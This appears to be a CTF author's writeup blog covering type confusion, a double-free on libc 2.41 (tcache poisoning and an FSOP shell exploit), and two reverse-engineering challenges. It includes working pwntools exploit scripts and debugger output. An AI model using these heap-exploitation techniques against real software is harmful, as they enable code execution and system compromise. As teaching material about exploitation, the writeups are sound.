2025-12-21 21:40:00 +0000

SIT ctf author writeups

recommended listening is 4 raws by esdeekid.

thanks to the exco for letting me contribute! :)

pwn/green-yuri

this challenge is about type confusion.

case '3':
  unsigned long long addr;
  printf("alright! finally. where's your album stored at? > ");
  scanf("%llx", &addr);
  while ((c = getchar()) != '\n' && c != EOF);
  Album *album = (Album *) addr;
  if (
    !strncmp(album->album_name, "me to her", 16) &&
    !strncmp(album->artist_name, "mitsuki koga", 16) &&
    album->song_count==10 &&
    album->completed
  ) win();
  puts("hmmm.. seems like the album isn't quite finished yet...");
  break;

the win condition for this challenge is passing in a valid Album struct with the correct fields set. we’re allowed to pass a pointer to our struct, the program casts it to an Album pointer, and checks if all of the fields are correctly set.

however, we do not have a way to actually create an Album struct. what we do have, however, is a way to add to paychecks, which is an array of doubles.

case '2':
  printf("how much money did you make today? > ");
  if (scanf("%lf", &paychecks[days]) == 1) {
    while ((c = getchar()) != '\n' && c != EOF);
    printf("you made %lf dollars today!\n", paychecks[days]);
  } else puts("invalid input...");
  break;

the program is compiled w/ no PIE (position independent executable) and the paychecks array is defined as a global variable outside of the scope of the main() function. this means that the address of paychecks is always the same.

first, we must understand what type confusion actually is. type confusion is when a program treats a variable with type A as if it were a variable with type B. it is not immediately clear why this leads to logic bugs, but consider the following program:

typedef struct {
  int secret_value;
  int other_secret_value;
} Secret;

typedef struct {
  int not_secret_value;
} Not_Secret;

void print_value(void* val) {
  Secret *secret = (Secret *) val;
  printf("%d, %d", 
         secret->secret_value,
         secret->other_secret_value
         );
  return;
}

if we ever get to call print_value() on an object w/ type Not_Secret, that second memory access (secret->other_secret_value) is going to end up accessing an out-of-bounds area not defined within our Not_Secret value.

typically these kinds of bugs are a lot more common in v8 / browser exploitation, the example presented in this challenge is a little contrived. but really i just thought to myself - huh what’s the most green-yuri coded pwn concept, and i ended up w/ type confusion.

anyways back to the challenge. let’s hop into GDB and present an example as to what might happen if we cast our paychecks array as an Album struct.

gef> p paychecks
$1 = {
  [0x0] = 100,
  [0x1] = 900,
  [0x2] = 300,
  [0x3] = 0 <repeats 125 times>
}

here is the result of p paychecks after i put in some sample values (note that because i compiled this program w/ debug symbols, gef knows that the paychecks variable is an array of doubles, and prints it accordingly). we can also see the underlying bytewise representation of paychecks, by doing x/4g:

gef> x/4g &paychecks
0x404080 <paychecks>:	        0x4059000000000000	0x408c200000000000
0x404090 <paychecks+16>:	0x4072c00000000000	0x0000000000000000

we can verify that 0x4059000000000000 is the correct 64-bit hexadecimal representation of the integer 100 when cast into a double, as seen below.

float

now, let’s see what will happen when we cast paychecks to an Album struct.

gef> set $album = (Album*)paychecks
gef> p $album
$2 = (Album *) 0x404080 <paychecks>
gef> ptype $album
type = struct {
    char album_name[16];
    char artist_name[16];
    short song_count;
    _Bool completed;
} *
gef> p $album->album_name
$3 = "\000\000\000\000\000\000Y@\000\000\000\000\000 \214@"
gef> p $album->artist_name
$4 = "\000\000\000\000\000\300r@\000\000\000\000\000\000\000"

we can see that the program still attempts to parse it as a valid Album struct by just reading the members of the struct as if they were the correct type (i.e., it tries to read the first float as a sixteen-long character array), so on and so forth.

our goal is to figure out how to forge this struct by figuring out the correct doubles to pass in to the program.

we can just do this dynamically w/ gdb as well. we’ll set our struct with the correct values, as shown below.

gef> set $album->album_name = "me to her"
gef> set $album->artist_name = "mitsuki koga"
gef> set $album->song_count = 10
gef> set $album->completed = 1

then, let’s check the values at paychecks.

gef> x/8g &paychecks
0x404080 <paychecks>:	        0x6568206f7420656d	0x0000000000000072
0x404090 <paychecks+16>:	0x20696b757374696d	0x0000000061676f6b
0x4040a0 <paychecks+32>:	0x000000000001000a	0x0000000000000000
0x4040b0 <paychecks+48>:	0x0000000000000000	0x0000000000000000

and finally, let’s see what they would look like as doubles.

gef> x/6lf &paychecks
0x404080 <paychecks>:	        3.1285662487989957e+180	5.6323483625902106e-322
0x404090 <paychecks+16>:	1.5167139053769265e-152	8.0738660577993429e-315
0x4040a0 <paychecks+32>:	3.2384026822310346e-319	0

so, if we just pass in these floats, and then get the address to paychecks (which is deterministic at every single run, due to PIE), we can win.

# it's just type confusion

from pwn import *

paychecks_addr = 0x404080
p = process('green-yuri')

doubles = [
    '3.1285662487989957e+180',
    '5.6323483625902106e-322',
    '1.5167139053769197e-152',
    '8.0738658996983363e-315',
    '3.2384026822310346e-319',
    '6.6387106766042457e-319',
    '0',
    '0'
]

# can ownself derive from manually gdbing

for i in doubles:
    p.sendline(b'2')
    p.sendline(i.encode())

p.sendline(b'3')
p.sendline(b'0x404080')

while True:
    print(p.recvline())

pwn/plushie-warehouse

this challenge is about exploiting a double-free in libc 2.41. before we get started, some background: i sent this challenge to my friend fern, who decided to write up the technique we use in greater detail here! you can read their writeup, it is very good.

the double-free is present in this section of code:

void sort_shipments(int idx) {
	if (orders_idx >= WAREHOUSE_SIZE) {
		printf("the list of orders is already full!\n");
		return;
	}
	sell_list[orders_idx] = idx;
	orders_idx++;
	printf("successfully added %d to the orders list.", idx);
	return;
}

void ship_orders() {

	printf("shipping out %d orders...\n", orders_idx);
	for (int idx = 0; idx < orders_idx; idx++) {
		if (sell_list[idx] != 0xff) {
			Plushie p = plushies[sell_list[idx]];
			if (p.name) {
				free(p.name);
			}
		}
	}

	// then null out the structs
	for (int idx = 0; idx < orders_idx; idx++) {
		if (sell_list[idx] != 0xff) {
			memset(&plushies[sell_list[idx]], 0, sizeof(plushies[sell_list[idx]]));
		}
	}
	orders_idx = 0;

	reset_sell_list();

}

we are given two options: add chunks to an array to be freed, then oneshot free them all. the key observation here is that we can add the same chunk twice to the array. if we add the same chunk twice, then after we do our oneshot free, it will free the same chunk twice accordingly. this is our double-free. how do we exploit it, especially on libc 2.41? libc 2.41 brings about a host of difficulties when it comes to this challenge, here are a list of them:

double free protection in tcache AND fastbin.
pointer mangling in tcache.
fastbin malloc checks.

how do we defeat each check?

1a. double free protection in tcache. here is the relevant source code from elixir.

in general i don’t expect people to go so in-depth and read elixir directly, but i think it’s good practice.

static __attribute__ ((noinline)) void
tcache_double_free_verify (tcache_entry *e, size_t tc_idx)
{
  tcache_entry *tmp;
  size_t cnt = 0;
  LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
  for (tmp = tcache->entries[tc_idx];
       tmp;
       tmp = REVEAL_PTR (tmp->next), ++cnt)
    {
      if (cnt >= mp_.tcache_count)
	malloc_printerr ("free(): too many chunks detected in tcache");
      if (__glibc_unlikely (!aligned_OK (tmp)))
	malloc_printerr ("free(): unaligned chunk detected in tcache 2");
      if (tmp == e)
	malloc_printerr ("free(): double free detected in tcache 2");
      /* If we get here, it was a coincidence.  We've wasted a
	 few cycles, but don't abort.  */
    }
}

problem: whenever we are about to free a chunk t into tcache, we check each entry and make sure there is no duplicate. if there is a duplicate, we error out.

solution: this is unavoidable. we basically just have to not perform double frees directly into tcache.

1b. double free protection in fastbins.

relevant source

if (SINGLE_THREAD_P)
  {
/* Check that the top of the bin is not the record we are going to
  add (i.e., double free).  */
if (__builtin_expect (old == p, 0))
malloc_printerr ("double free or corruption (fasttop)");
p->fd = PROTECT_PTR (&p->fd, old);
*fb = p;
  }

problem: whenever we are about to free a chunk t into fastbin, we check if the top of fastbin points to that same chunk t. if so, we error out.

solution: we can just free another sacrificial chunk before doing our double free. in essence, we free chunk t, then chunk t1, then chunk t again.

2. pointer mangling in tcache, elixir source

any person who’s done tcache poisoning should be familiar with this.

/* Safe-Linking:
   Use randomness from ASLR (mmap_base) to protect single-linked lists
   of Fast-Bins and TCache.  That is, mask the "next" pointers of the
   lists' chunks, and also perform allocation alignment checks on them.
   This mechanism reduces the risk of pointer hijacking, as was done with
   Safe-Unlinking in the double-linked lists of Small-Bins.
   It assumes a minimum page size of 4096 bytes (12 bits).  Systems with
   larger pages provide less entropy, although the pointer mangling
   still works.  */
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

problem: chunks in tcache point to the next chunk in tcache. however, their pointers are mangled with the value (heap_base >> 12), so we will need to know where the heap is in memory.

gef> bins
----------------- Tcache Bins for arena 'main_arena' (&tcache_perthread_struct->entries[0]: 0x5555555590a8) -----------------
tcachebins[idx=1, size=0x30, @0x5555555590b0]: fd=0x555555559840 count=7
 -> Chunk(base=0x555555559830, addr=0x555555559840, size=0x30, flags=PREV_INUSE, fd=0x55500000cd49(=0x555555559810))
...
gef> x/4x 0x555555559800
0x555555559800:	0x0000000000000000	0x0000000000000031
0x555555559810:	0x000055500000c2b9	0xb6f37a1e26ba13a0

note the fd=0x55500000cd49(=0x555555559810) line. 0x55500000cd49 is the value actually stored in the chunk, whereas 0x555555559810 is the value of the actual pointer after unmangling.

solution: the program does not perform write on allocations. if we malloc, free, then malloc a chunk t, reading directly from that chunk t would give us the data that gets populated during freeing, which is a pointer to the next chunk in tcache. this gives us our heap leak.

3. fastbin malloc checks.

problem: fastbin checks both the size header and the alignment whenever we malloc a new chunk from it. this severely limits our arballoc (if we ever get it), because we would only be able to arballoc to places that pass both checks.

---------------------------------------------- Fast Bins for arena 'main_arena' ----------------------------------------------
fastbins[idx=1, size=0x30, @0x7ffff7e13ad8]: fd=0x0000004058c0
 -> Chunk(base=0x4058c0, addr=0x4058d0, size=0x30, flags=PREV_INUSE, fd=0x000000405c95
(=0x000000405890)) <- pointing to this address
...
gef> x/4gx 0x000000405890
0x405890:	0x0000000000000000	0x0000000000000031 <- valid size header
0x4058a0:	0x0000000000405c65	0x0000000000000000

to exemplify, note the above snippet. we see a valid fastbin chunk’s fd ptr points to a chunk where the size header is correctly set as 0x31. if we, however, tried to allocate to something useful (such as, say, the stderr file structure, the size check would catch us).

solution: we don’t do our arbitrary allocation from fastbins! we will do them from tcache instead. essentially, what we do is:

fill the tcache by allocating 7 times
fill the fastbins by allocating 2 more times. call this chunk A and chunk B.
add our tcache chunks to the freelist.
add chunk A to the freelist, then chunk B, then chunk A again. this circumvents the first fastbin dup check.
then, perform our oneshot free.
then, we empty tcache again to make way for our duplicated pointers (by just mallocing chunks of the same size).
then… SECRET FENG SHUI, ENABLED BY:

#if USE_TCACHE
  /* While we're here, if we see other chunks of the same size,
 stash them in the tcache.  */
  size_t tc_idx = csize2tidx (nb);
  if (tcache && tc_idx < mp_.tcache_bins)
{
  mchunkptr tc_victim;

  /* While bin not empty and tcache not full, copy chunks.  */
  while (tcache->counts[tc_idx] < mp_.tcache_count
	 && (tc_victim = *fb) != NULL)
    {
      if (__glibc_unlikely (misaligned_chunk (tc_victim)))
	malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");
      if (SINGLE_THREAD_P)
	*fb = REVEAL_PTR (tc_victim->fd);
      else
	{
	  REMOVE_FB (fb, pp, tc_victim);
	  if (__glibc_unlikely (tc_victim == NULL))
	    break;
	}
      tcache_put (tc_victim, tc_idx);
    }
}
#endif

simply put, when we reallocate from fastbins when the tcache is empty, all our chunks get yanked into the fastbin, without checking for double frees within the fastbin itself.

so, if we just claim a fastbin chunk once, our duplicated pointers automatically get put in tcache, and we are free to tcache poison and claim them from there!

let’s consolidate our exploit for now. first we can obtain a libc leak from unsorted bins. recall that the unsorted bins are a doubly linked list with both fd and bk pointers, and that when we free a chunk into the unsorted bins, both pointers point to main_arena, which is an area in libc. you can see this in action w/ the following example below:

gef> bins
---------------------------- Unsorted Bin for arena 'main_arena' ----------------------------
unsorted_bin[idx=0, size=any, @0x7ffff7e13b30]: fd=0x555555559000, bk=0x7ffff7e13b20
 -> Chunk(base=0x555555559000, addr=0x555555559010, size=0x510, flags=PREV_INUSE, 

fd=0x7ffff7e13b20 <main_arena+0x60>, bk=0x7ffff7e13b20 <main_arena+0x60>)
[+] Found 1 valid chunks in unsorted bin (when traced from `bk`)

we can free a chunk straight into the unsorted bin simply by just allocating a size so large that it does not fit into the tcache. the code to perform this is below (also note that main_arena is always a fixed offset from libc base).

# our libc leak:
malloc(0, 0x1000)
malloc(1, 0x20) # guard chunk, so that when we free the 0x1000 sized chunk it doesn't get consolidated w/ the top chunk

addf(0); addf(1);
free()
malloc(0, 0x1000) # we reclaim our chunk from the unsorted bins

libc_leak = int.from_bytes(read().split(b'name ')[1].split(b',')[0], 'little')
print(hex(libc_leak))
libc.address = libc_leak - 0x1e7b20 # whack in gdb
addf(0); free();

afterwards, we can get a heap leak by doing the same thing, but in the tcache.

# heap leak
malloc(0, 0x30)
addf(1); addf(0); free()
malloc(0, 0x30)
malloc(1, 0x30)
heap_leak = int.from_bytes(read().split(b'name ')[2].split(b',')[0], 'little')
print(hex(heap_leak)) 
addf(0); addf(1); free()

this is the same concept as above: we malloc chunks, free them, then reallocate them so that we can read the fd pointer (that gets populated on freeing).

now, onto the actual exploit:

print('[*] allocating 9 chunks to fill tcache + double free')
for i in range(9):
    malloc(i, 0x30)

for i in range(7):
    addf(i)

free() # fill tcache
addf(7); addf(8); addf(7)
free() # double free

we allocate 9 chunks, free the first 7. then we add chunk 8, chunk 9, and then chunk 8 again to the free list. this results in the following state in fastbins.

--------------------- Fast Bins for arena 'main_arena' ---------------------
fastbins[idx=2, size=0x40, @0x7f94d0e13ae0]: fd=0x564ea7bd11c0
 -> Chunk(base=0x564ea7bd11c0, addr=0x564ea7bd11d0, size=0x40, flags=PREV_INUSE, fd=0x564bc35769d1(=0x564ea7bd1200))
 -> Chunk(base=0x564ea7bd1200, addr=0x564ea7bd1210, size=0x40, flags=PREV_INUSE, fd=0x564bc3576a11(=0x564ea7bd11c0))
 -> Chunk(base=0x564ea7bd11c0, addr=0x564ea7bd11d0, size=0x40, flags=PREV_INUSE, fd=0x564bc35769d1(=0x564ea7bd1200))
 -> 0x564ea7bd11c0 [loop detected]
[+] Found 2 valid chunks in fastbins

note the (loop detected) - that means we have our double free. afterwards, we empty tcache again and reclaim our first fastbin chunk, thereby putting our duplicated pointers into tcache.

print('[*] re-emptying tcache')

for i in range(7):
    malloc(i, 0x30) # empty tcache so we can yank the fastbin chunks into tcache for tcache poisoning

malloc(7, 0x30) # yank!
input('...')

this results in the following state in tcache. now, if we can just claim the first chunk, we essentially have a use-after-free. this is because after claiming the first chunk, we can edit it (and thereby edit its fd pointer).

assume we start with tcache in this state, where we have 3 chunks, the first and last of which are duplicated.

tcachebins[idx=2, size=0x40, @0x55764a9700c8]: fd=0x55764a96f210 count=-21868
 -> Chunk(base=0x55764a96f200, addr=0x55764a96f210, size=0x40, flags=PREV_INUSE, fd=0x55731df258bf(=0x55764a96f1d0))
 -> Chunk(base=0x55764a96f1c0, addr=0x55764a96f1d0, size=0x40, flags=PREV_INUSE, fd=0x55731df25b7f(=0x55764a96f210))
 -> Chunk(base=0x55764a96f200, addr=0x55764a96f210, size=0x40, flags=PREV_INUSE, fd=0x55731df258bf(=0x55764a96f1d0))

then, we claim the first chunk, and then edit it to some nonsense value.

print('[*] now poisoning tcache for that chunk')
malloc(7, 0x30)
write(7, p64(0xcacacacacacacaca  ^ heap_leak))
input('...')

viewing the state of the tcache, we can now see that the last chunk’s fd pointer is now corrupted.

tcachebins[idx=2, size=0x40, @0x55caa68ed0c8]: fd=0x55caa68ec210 count=-21960
 -> Chunk(base=0x55caa68ec200, addr=0x55caa68ec210, size=0x40, flags=PREV_INUSE, fd=0x55cffa24a93c(=0x55caa68ec1d0))
 -> Chunk(base=0x55caa68ec1c0, addr=0x55caa68ec1d0, size=0x40, flags=PREV_INUSE, 
fd=0xcacacacf9660a226(=0xcacacacacacacaca), corrupted)
^ kena poison

now we essentially have arbitrary write (albeit of a limited size). our first goal should be to get writes of a larger size. how do we do this?

by tcache poisoning again! we can arbitrarily allocate over another bigger chunk’s fd pointer.

malloc(8, 0x200) # this is the chunk whose fd ptr we want to overwrite
malloc(9, 0x200) # malloc another time to increase tcache count

addf(8); addf(9); free()

viewing the state of the tcache once more, we can figure out which address we want to override.

tcachebins[idx=31, size=0x210, @0x562a377701b0]: fd=0x562a3776f460 count=7
 -> Chunk(base=0x562a3776f450, addr=0x562a3776f460, size=0x210, flags=PREV_INUSE, fd=0x562f55d5853f(=0x562a3776f250))
 -> Chunk(base=0x562a3776f240, addr=0x562a3776f250, size=0x210, flags=PREV_INUSE, fd=0x000562a3776f(=0x000000000000))

gef> x/4x 0x562a3776f450
0x562a3776f450: 0x0000000000000000      0x0000000000000211
0x562a3776f460: 0x0000562f55d5853f      0x2f8390a87fe29df0

(the actual address would be 0x[HEAP BASE]460).

tcachebins[idx=2, size=0x40, @0x558da03820c8]: fd=0x558da0381210 count=-21889

-> Chunk(base=0x558da0381200, addr=0x558da0381210, size=0x40, flags=PREV_INUSE, fd=0x5588f8e21251(=0x558da03811d0))

[here is our chunk of interest]
-> Chunk(base=0x558da03811c0, addr=0x558da03811d0, size=0x40, flags=PREV_INUSE, 
fd=0x5588f8e217e1(=0x558da0381460))

note that our 2nd chunk has the corrupted fd pointer. this means that we’ll need to allocate 3 chunks in order to get our chunk arbitrarily allocated.

print('[*] now getting arballoc over victim chunk fd ptr')

target_addr = (heap_leak << 12) | 0x460
write(7, p64(target_addr  ^ heap_leak))

malloc(11, 0x30); malloc(12, 0x30); malloc(13, 0x30)
write(13, p64(0xcacacacacacacaca ^ heap_leak))

print(f'[*] larger chunk should now be poisoned')

tcachebins[idx=31, size=0x210, @0x5587b6a9a1b0]: fd=0x5587b6a99460 count=7
 -> Chunk(base=0x5587b6a99450, addr=0x5587b6a99460, size=0x210, flags=PREV_INUSE, fd=0xcacacacf92b1a053(=0xcacacacacacacaca), corrupted)
 -> 0xcacacacacacacaca [corrupted chunk]

perfect! we now have big enough writes. given that we have access to such large writes, we can just do fsop and win.

input('[!] sanity check')

malloc(8, 0xe0)
malloc(9, 0xe8)

print('[*] chunk now claimed over stdout')

payload = flat({
    0x00: b"  sh",
 
    0x20: 0x0,
    0x28: 0x1,
 
    0x88: libc.sym._IO_stdfile_1_lock,
    0xa0: libc.sym._IO_2_1_stdout_,
    0xc0: 0x0,
    0xd8: libc.sym._IO_wfile_jumps-0x20,
 
    0x18: 0x0,
    0x30: 0x0,
    0xe0: libc.sym._IO_2_1_stdout_,
 
    0x68: libc.sym.system
}, filler=b"\x00")

p.sendline(b'2')
p.sendline(b'9')
p.sendline(payload)
p.interactive()

rev/san andreas fault line

The binary isn’t hard to rev given there’s no obfuscation, any compiler anyhow dogshit whack also can. The key here is this traverse() function:

void traverse(unsigned long long **ptr1, unsigned long long **ptr2, unsigned long long **saved_ptr, uintptr_t pointer_mangle, ByteCheck byte_chunks[4], unsigned char flag_chunks[4], int iter) {
	free(*ptr2);
	free(*ptr1);

	for (int y = 0; y < 2; y++) {
		unsigned long long target_addr = 0x100 + ((pointer_mangle << 12) | ((flag_chunks[0] >> (4*y) & 0xf) ^ 0x2 ^ byte_chunks[0].nibbles[y]));
		unsigned long long *fake_chunk = (unsigned long long*)target_addr;
		fake_chunk[-1] = 0x31;
		*saved_ptr[0] = target_addr ^ pointer_mangle;
		*ptr1 = malloc(0x20);
		*ptr2 = malloc(0x20);
		free(*ptr2);
		free(*ptr1);
	}

Complicated. But anyways before that there’s two rudimentary checks that just veerify if our flag has the correct CyberBlitz2025{} prefix and suffix, formed by dereferencing the ptr output of strstr().

	strncpy(actual_bytes, strstr(flag, "CyberBlitz2025{")+15, sizeof(actual_bytes));	
	char *c = strstr(actual_bytes, "}");
	*c = '\0';

Hopefully this requires no explanation. Moving on to the interesting part:

We’ll need to know some things about how malloc() works on the latest version of libc, 2.41 (the libc version is provided in the files distributed to the competitors, too.)

First thing is that malloc() mangles the tcache ptr with a certain key. This is computed as pointer_mangle in the binary, so it’s already taken care of for us.

Second thing is that malloc() will throw a SIGABRT if it tries to malloc() at an area that is not 0x10 aligned. This is the functionality that the entire flag-checker is based off of: the given inputs are used to manipulate tcache pointers. We go byte-by-byte, poisoning the fd ptrs of each chunk in our bin, and then re-malloc() - if our bytes are correct, the ptrs will be correctly 0x10 aligned, and we’re good. We need to do this for each byte.

Now, the specifics as to how this actually works:

When we free two chunks A and B, they both get sent to tcache, and chunk A is populated with an fd ptr that points to where B is. If we have an UAF, we can just alter this fd ptr after it’s freed, hence controlling where malloc() tries to allocate a chunk at. This is a basic heap pwn concept known as tcache poisoning. There’s a few kinks for this to actually work (mainly, valid chunk headers, but I take care of those in the binary already).

You might ask: wait why does this sound like pwn and not rev. The answer is: umm uhh :3

Anyways, we have to unpack this bitwise nonsense being performed in traverse():

unsigned long long target_addr = 0x100 + ((pointer_mangle << 12) | ((flag_chunks[0] >> (4*y) & 0xf) ^ 0x2 ^ byte_chunks[0].nibbles[y]));

We can ignore pointer_mangle << 12. y is iterated through from 0 to 1, and the bitshifts actually suggest to use that we’re isolating each nibble of the byte, xoring it with a given constant (it ranges from 0x2 - 0x8 depending on which loop we’re in) and then further xoring it with the 1st or 2nd nibble in byte_chunks. We know that we need this to eventually be 0x10.

This essentially reduces the chal to a trivial xor problem, with only one unknown (our flag byte!).

We can just code up a simple Python script, extracting the ByteChecks from our binary.

flag_bytes = 
[[18,21],[16,23],[20,17],[19,30],[29,23],[16,17],[30,16],[28,27],[22,21],[27,17],[21,16],[25,28],[16,21],[27,17],[18,18],[26,29],[18,17],[20,19],[25,19],[28,31],[26,20],[16,23],[18,17],[23,29],[18,21],[28,18],[22,21],[22,30],[17,17],[27,17],[21,17],[25,27],[17,17],[23,23],[21,21],[24,31],[29,23],[20,23],[24,16],[23,29],[22,21],[28,16],[21,21],[23,29],[20,20],[21,23],[22,21],[24,27],[16,21],[27,17],[18,18],[26,29],[17,17],[16,23],[27,16],[23,29],[19,20],[22,18],[22,21],[29,31],[22,21],[27,17],[27,16],[27,27]]

for idx, byte in enumerate(flag_bytes):
    offset = 0x2 * (1 + (idx % 4))
    flag = 0x00
    for idx, nibble in enumerate(byte):
        flag_nibble = 0x10 ^ offset ^ nibble
        flag |= flag_nibble << (idx * 4)
    print(chr(flag), end='')

Done!

rev/throwback

the file is a stripped, statically linked binary for the msp430:

[-(navi's curette)-[~/venvs/msp430-nix-env/example-asm]
[-$ file rev.bin                                 
rev.bin: ELF 32-bit LSB executable, TI msp430, version 1 (embedded), statically linked, not stripped

you’re not gonna be able to run this on any laptop or pc you have lying around, so we’ll have to figure out how to interact with it statically.

(orrr you can just run this through a msp430 emulator, this does just solve it automatically.)

static reversing

there’s a toolchain for the msp430 with a few useful tools, but the main one here is objdump, which we can use to obtain clean disassembly for the binary. we definitely won’t be able to obtain anything resembling ‘clean’ decompilation - the assembly was handwritten and doesn’t decompile at all. (however, ghidra is able to recognize the msp430 format and give a working decomp as well. i find working with msp430-elf-objdump’s output a lot cleaner.)

0000c000 <.text>:
    c000:	0d 40       	mov	r0,	r13	;
    c002:	31 40 00 20 	mov	#8192,	r1	;#0x2000
    c006:	0f 41       	mov	r1,	r15	;
    c008:	3e 40 00 4d 	mov	#19712,	r14	;#0x4d00
    c00c:	0e 12       	push	r14		;
    c00e:	3e 40 03 43 	mov	#17155,	r14	;#0x4303
    c012:	0e 12       	push	r14		;
    c014:	3e 40 2b 52 	mov	#21035,	r14	;#0x522b

looking at the assembly, we see a whole lot of these mov and push instructions, at least like 100 or so. but the first few instructions are just movs to certain registers.

recall that for the msp430, certain registers have certain special functions. the important ones for our case are:

r0: program counter. tells us which instruction is being executed. note that we can perform operations on this register like any other - we can mov to it, which changes our entire program flow. we can also add / sub to it, which is actually just what a jmp instruction is a mnemonic for.
r1: stack pointer, points to the stack in memory. recall that the stack grows downwards, so if our stack pointer is at 0x2000, and we push a word 0xcafe, the stack pointer would then be decreased to 0x1ffe.
r2: status register. not relevant for our purposes, won’t cover.
r3: constant generator. the msp430 is able to generate a few hardcoded constants _within_ their registers, such that they don't need to be loaded from memory and occupy precious space. the constants are 1, 2, 4, 8`.

the rest are all general purpose registers which we can use however we want.

inspecting the binary’s disassembly again, let’s just break it down some more:

    c000:	0d 40       	mov	r0,	r13	;
    c002:	31 40 00 20 	mov	#8192,	r1	;#0x2000
    c006:	0f 41       	mov	r1,	r15	;

so this section preserves the initial program counter into r13, and also initializes the stack pointer at a fixed point 0x2000.

then. there’s a whole lot of mov _word_, r14 and push r14 calls:

    c6de:	0e 12       	push	r14		;
    c6e0:	3e 40 24 82 	mov	#-32220,r14	;#0x8224
    c6e4:	0e 12       	push	r14		;
    c6e6:	3e 40 04 54 	mov	#21508,	r14	;#0x5404
    c6ea:	0e 12       	push	r14		;
    c6ec:	3e 40 04 54 	mov	#21508,	r14	;#0x5404
    c6f0:	0e 12       	push	r14		;
    c6f2:	3e 40 04 54 	mov	#21508,	r14	;#0x5404
    c6f6:	0e 12       	push	r14		;
    c6f8:	3e 40 34 52 	mov	#21044,	r14	;#0x5234
    c6fc:	0e 12       	push	r14		;
    c6fe:	3e 40 04 e4 	mov	#-7164,	r14	;#0xe404
    c702:	0e 12       	push	r14		;

(list cut for brevity)

and finally we reach this br instruction:

c704:	00 41       	br	r1		;

br is equivalent to mov.w r1, r0: essentially, we are moving the addresses from r1 into r0. since that’s the stack pointer and the program counter, we’re essentially going to execute the contents of the stack! meaning, the whole list of mov and push instructions contain actual code that will be executed!

the next step is to disassemble the dynamically loaded shellcode. there’s a few ways to do this. to be honest i would just patch the binary w/ nops and let the objdump disassembler do the rest of the work, but there are some caveats with doing this:

because the stack grows downward and the program counter goes upwards, this means the very last instruction pushed onto the stack is the first one executed, and the very first instruction pushed onto the stack is the last one executed. a stack is LIFO, after all, so this should be intuitive.

anyways let’s view a hexdump so we can better see what we’re working with. we want to access the bytecode and bytecode only, and leave everything else untouched. we can crossref with the objdump output as well, noting that we should see an 0d40 as our beginning instruction.

[-$ xxd rev.bin                    
00000000: 7f45 4c46 0101 01ff 0000 0000 0000 0000  .ELF............
00000010: 0200 6900 0100 0000 00c0 0000 3400 0000  ..i.........4...
00000020: cc07 0000 2d00 0000 3400 2000 0200 2800  ....-...4. ...(.
00000030: 0500 0400 0100 0000 0000 0000 8cbf 0000  ................
00000040: 8cbf 0000 8407 0000 8407 0000 0500 0000  ................
00000050: 0400 0000 0100 0000 8607 0000 feff 0000  ................
00000060: feff 0000 0200 0000 0200 0000 0400 0000  ................
00000070: 0400 0000 [0d40] 3140 0020 0f41 3e40 004d  .....@1@. .A>@.M
00000080: 0e12 3e40 0343 0e12 3e40 2b52 0e12 3e40  ..>@.C..>@+R..>@
00000090: 0b5b 0e12 3e40 0b5b 0e12 3e40 0b5b 0e12  .[..>@.[..>@.[..
000000a0: 3e40 2b52 0e12 3e40 0b5b 0e12 3e40 0b5b  >@+R..>@.[..>@.[
000000b0: 0e12 3e40 0b5b 0e12 3e40 2b82 0e12 3e40  ..>@.[..>@+...>@
000000c0: 3b82 0e12 3e40 0b5b 0e12 3e40 0b5b 0e12  ;...>@.[..>@.[..
000000d0: 3e40 0b5b 0e12 3e40 0b5b 0e12 3e40 0b5b  >@.[..>@.[..>@.[
000000e0: 0e12 3e40 0b5b 0e12 3e40 3b52 0e12 3e40  ..>@.[..>@;R..>@
000000f0: 0beb 0e12 3e40 1a83 0e12 3e40 2a52 0e12  ....>@....>@*R..
00000100: 3e40 0a5a 0e12 3e40 0a5a 0e12 3e40 0a5a  >@.Z..>@.Z..>@.Z
00000110: 0e12 3e40 2a53 0e12 3e40 3a52 0e12 3e40  ..>@*S..>@:R..>@
00000120: 0a5a 0e12 3e40 0a5a 0e12 3e40 0a5a 0e12  .Z..>@.Z..>@.Z..

in the above dump i’ve wrapped the 0d40 instruction in brackets - so we know that that’s where execution begins. essentially, what we want is to patch out every 3e40 instruction (which is a mov.w r14) and leave only the word that is actually being pushed.

import subprocess

binary_bytes = open('rev.bin', 'rb').read()
patched_bytes = list(binary_bytes)

for idx in range(0, len(binary_bytes) - 1, 2):
    word = binary_bytes[idx:idx+2].hex()
    if word == '3e40' or word=='0e12':
        patched_bytes[idx] = 0x03 # this is a nop
        patched_bytes[idx+1] = 0x43

patched_binary = open('rev_patched.bin', 'wb')

above is the script i used. patching out the push and mov instructions and disassembling, we get the following:

c6d6:       04 54           rla     r4              ;
c6dc:       04 54           rla     r4              ;
c6e2:       24 82           sub     #4,     r4      ;r2 As==10
c6e8:       04 54           rla     r4              ;
c6ee:       04 54           rla     r4              ;
c6f4:       04 54           rla     r4              ;
c6fa:       34 52           add     #8,     r4      ;r2 As==11
c700:       04 e4           xor     r4,     r4      ;
c702:       03 43           nop
c704:       00 41           br      r1              ;

oh! we have valid bytecode! we have edits to registers!!! woohoo! yipee! we know what its doing now!! woohoo!!!

keep in mind that the commands are LIFO so we need to read it from the bottom up. but we can see that there’s a clear to the r4 register, and then we do various arithmetic operations.

and then…

c00a:       00 4d           br      r13             ;
c016:       2b 52           add     #4,     r11     ;r2 As==10
c01c:       0b 5b           rla     r11             ;
c022:       0b 5b           rla     r11             ;
c028:       0b 5b           rla     r11             ;
c02e:       2b 52           add     #4,     r11     ;r2 As==10
c034:       0b 5b           rla     r11             ;
c03a:       0b 5b           rla     r11             ;

that br r13 just tells us we’re swapping control flow back to the address stored in r13. if we recall, the content stored in r13 is just…

c000:       0d 40           mov     r0,     r13     ;

it’s just the original pc from the main program flow! so this just moves us back into the start of the original program, and the program enters an infinite loop!

so now, where do we get the flag? this is the part of the chal that might be a little ‘guessy’ but given the msp430 has no builtin input/output functionality, i couldn’t just write a flagchecker that accepts input from a terminal (believe me, i’ve tried! the school has not been able to give me the necessary devices for UART unfortunately, i wouldve loved to implement this in the chal)

given that we’re altering the registers, why don’t we just figure out what the values of each register would be after the program execution? registers r4 to r11 are modified twice in the shellcode loop with the arithmetic operations, so we can basically just write an ‘emulator’ of sorts to figure out what the operations are actually doing.

